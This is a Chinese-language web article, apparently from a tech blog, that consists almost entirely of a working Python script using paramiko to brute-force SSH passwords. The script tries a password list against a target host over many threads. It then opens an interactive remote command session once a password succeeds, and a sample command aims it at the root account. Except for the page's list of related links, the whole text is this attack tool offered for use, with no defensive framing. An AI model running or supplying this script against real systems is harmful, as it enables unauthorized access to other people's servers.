当前位置: 首页 > article >正文

paramiko 库实现的暴力破解 SSH 密码

import paramiko
import optparse
import threading
import time
from threading import Thread, BoundedSemaphore

# 用paramiko暴力破解SSH密码
# 最大并发连接尝试的数量,可根据实际情况调整,适当减小可降低对目标服务器的压力以及减少多线程同步问题出现的概率
maxConnections = 2
# 创建一个有界信号量,用于控制并发连接的数量,初始值设为最大并发连接数
connection_lock = BoundedSemaphore(value=maxConnections)
# 用于标记是否已经找到正确的密码,初始化为False,一旦找到正确密码,将被设置为True
Found = False
# 记录连接失败的次数,初始化为0,后续根据失败情况累加
Fails = 0
# 创建一个线程锁,用于控制打印输出,避免多线程打印时出现混乱
print_lock = threading.Lock()
# 创建一个线程锁,用于控制对共享变量Found等的修改操作,保证线程安全
stop_lock = threading.Lock()


def connect(host, user, password):
    """
    尝试使用给定的主机、用户和密码建立SSH连接
    :param host: 目标主机地址
    :param user: 用户名
    :param password: 密码
    :return: 如果成功连接返回密码(即找到的正确密码),否则返回None
    """
    # 获取当前线程的名称,方便在打印信息中标识是哪个线程在执行操作
    current_thread = threading.current_thread().name
    print(f"[{current_thread}] 开始尝试连接,使用密码: {password}")
    global Found
    global Fails
    try:
        print(f"[{current_thread}] 尝试获取连接锁")
        # 获取连接锁,保证同一时间只有指定数量(由maxConnections控制)的线程能尝试连接
        connection_lock.acquire()
        print(f"[{current_thread}] 成功获取连接锁")
        ssh_client = paramiko.SSHClient()
        # 设置自动添加主机密钥策略,避免因未知主机密钥导致连接失败(这种方式存在一定安全风险,生产环境需谨慎使用)
        ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # 尝试使用给定的主机、用户和密码建立SSH连接
        ssh_client.connect(host, port=22, username=user, password=password)
        # 获取打印锁,确保多个线程打印信息时不会出现混乱,然后打印找到密码的提示信息
        with print_lock:
            print('[+] Password Found')
        # 获取停止锁,用于安全地修改共享变量Found,将其设置为True,表示已找到密码,并打印提示信息告知其他线程停止尝试
        with stop_lock:
            Found = True
            print(f"[{current_thread}] 已将Found变量设置为True,表示找到密码,通知其他线程停止尝试")
        print(f"[{current_thread}] 成功连接,返回密码: {password}")
        return password
    except paramiko.AuthenticationException:
        # 获取停止锁,检查是否已经通过其他线程找到了密码,如果已找到则本线程停止尝试并返回None
        with stop_lock:
            if Found:
                print(f"[{current_thread}] 已找到密码(通过Found变量判断),本线程停止尝试,返回None")
                return None
            print(f"[{current_thread}] 认证失败,请检查用户名和密码是否正确")
        Fails += 1
        # 这里将最大失败次数设置为可配置的变量MAX_FAILURES,方便根据实际情况调整
        if Fails > MAX_FAILURES:
            with print_lock:
                print("[!] Exiting: Too many connection failures")
            print(f"[{current_thread}] 达到最大失败次数,本线程停止,返回None")
            return None
        print(f"[{current_thread}] 继续下一次尝试,返回None")
        return None
    except paramiko.SSHException as ssh_exception:
        with print_lock:
            print(f"[{current_thread}] SSH连接出现异常: {ssh_exception}")
        Fails += 1
        if Fails > MAX_FAILURES:
            with print_lock:
                print("[!] Exiting: Too many connection failures")
            return None
        return None
    except Exception as e:
        with print_lock:
            print(f"[{current_thread}] 出现其他未知异常: {e}")
        Fails += 1
        if Fails > MAX_FAILURES:
            with print_lock:
                print("[!] Exiting: Too many connection failures")
            return None
        return None
    finally:
        print(f"[{current_thread}] 准备释放连接锁")
        # 释放连接锁,允许其他等待的线程获取锁并尝试连接
        connection_lock.release()
        print(f"[{current_thread}] 成功释放连接锁")


def interact_with_remote(host, user, password):
    """
    在登录成功后,进入与远程主机的交互模式,可执行命令
    :param host: 目标主机地址
    :param user: 用户名
    :param password: 正确密码
    """
    ssh_client = paramiko.SSHClient()
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh_client.connect(host, port=22, username=user, password=password)
        print(f"[*] 已成功登录 {host},现在可以输入命令与远程主机交互(输入 'exit' 可退出交互模式)")
        while True:
            command = input("请输入要执行的命令: ")
            if command.lower() == "exit":
                break
            try:
                stdin, stdout, stderr = ssh_client.exec_command(command)
                result = stdout.read().decode('utf-8')
                print(result)
            except paramiko.SSHException as e:
                print(f"[!] 执行命令时出现 SSH 异常: {e}")
            except UnicodeDecodeError:
                print(f"[!] 命令执行结果解码出现问题,请检查编码格式")
    except paramiko.AuthenticationException:
        print(f"[!] 交互时认证出现问题,请检查用户名和密码是否正确")
    except paramiko.SSHException as ssh_exception:
        print(f"[!] 建立交互连接时出现 SSH 异常: {ssh_exception}")
    except Exception as e:
        print(f"[!] 出现其他未知异常: e")
    finally:
        ssh_client.close()
        print("[*] 已退出与远程主机的交互,程序继续运行...")


def main():
    global MAX_FAILURES
    # 最大失败次数设置为20,可根据实际情况灵活调整这个值,当连接失败次数超过这个值时,线程停止尝试
    MAX_FAILURES = 20
    parser = optparse.OptionParser('usage: %prog -H<target host> -u<user> -F<password list>')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-u', dest='user', type='string', help='specify the user')
    parser.add_option('-F', dest='passwdFile', type='string', help='specify password file')
    (opts, args) = parser.parse_args()

    host = opts.host
    passwdFile = opts.passwdFile
    user = opts.user

    if host is None or user is None or passwdFile is None:
        print(parser.usage)
        exit(0)

    correct_password = None
    password_found_event = threading.Event()
    line_number = 0  # 添加变量用于记录当前读取的行数

    with open(passwdFile, 'r') as fn:
        for line in fn.readlines():
            line_number += 1  # 每读取一行,行数加1
            print(f"[*] 当前读取到第 {line_number} 行,密码为: {line.strip()}")  # 打印出行数和密码内容
            password = line.strip()
            print(f"[*] 准备获取连接锁")
            connection_lock.acquire()
            print(f"[*] 成功获取连接锁")
            t = Thread(target=connect, args=(host, user, password))
            t.name = f"Thread-{password}"
            t.start()

            print(f"[*] 开始检查密码是否找到,当前password_found_event状态: {password_found_event.is_set()}")
            while True:
                if Found:
                    correct_password = password
                    password_found_event.set()
                    print(f"[*] 已找到密码,设置password_found_event事件")
                    break
                time.sleep(0.01)

            print(f"[*] 结束本次密码检查,当前password_found_event状态: {password_found_event.is_set()}")
            if password_found_event.is_set():
                print(f"[*] 检测到password_found_event已设置,准备跳出外层循环")
                break

    if password_found_event.is_set():
        interact_with_remote(host, user, correct_password)


if __name__ == '__main__':
    main()
运行命令python3 your_script_name.py -H 192.168.1.100 -u root -F /path/to/passwords.txt

运行结果:

 


http://www.kler.cn/a/396990.html

相关文章:

  • Hadoop生态圈框架部署(六)- HBase完全分布式部署
  • 图像深度与像素深度的辨析
  • ubuntu16.04配置网卡
  • 金山云Java 开发面试题及参考答案
  • 【从零开始的LeetCode-算法】3270. 求出数字答案
  • Git如何简单使用
  • 建筑企业新闻稿怎么写?工程行业评职称品牌宣传背书的报纸期刊杂志媒体有哪些
  • 实现 MVC 模式
  • 第23课-C++-红黑树的插入与旋转
  • 新增支持Elasticsearch数据源,支持自定义在线地图风格,DataEase开源BI工具v2.10.2 LTS发布
  • Godot的开发框架应当是什么样子的?
  • .NET 9 中 IFormFile 的详细使用讲解
  • ubuntu16.04配置网卡
  • Python毕业设计选题:基于django+vue的二手物品交易系统
  • (一)机器学习、深度学习基本概念简介
  • 鸿蒙next版开发:使用HiDebug获取调试信息(ArkTS)
  • ini-parser 使用
  • 大模型(LLMs)微调篇
  • Linux 用户账户信息配置文件详解
  • 快速认识和上手Protobuf
  • 无插件H5播放器EasyPlayer.js网页web无插件播放器选择全屏时,视频区域并没有全屏问题的解决方案
  • 如何使用 XML Schema
  • 从0安装mysql server
  • flask+vue使用jwt验证
  • 躺平成长-人工智能进行编程-(12)
  • notepad++下载安装教程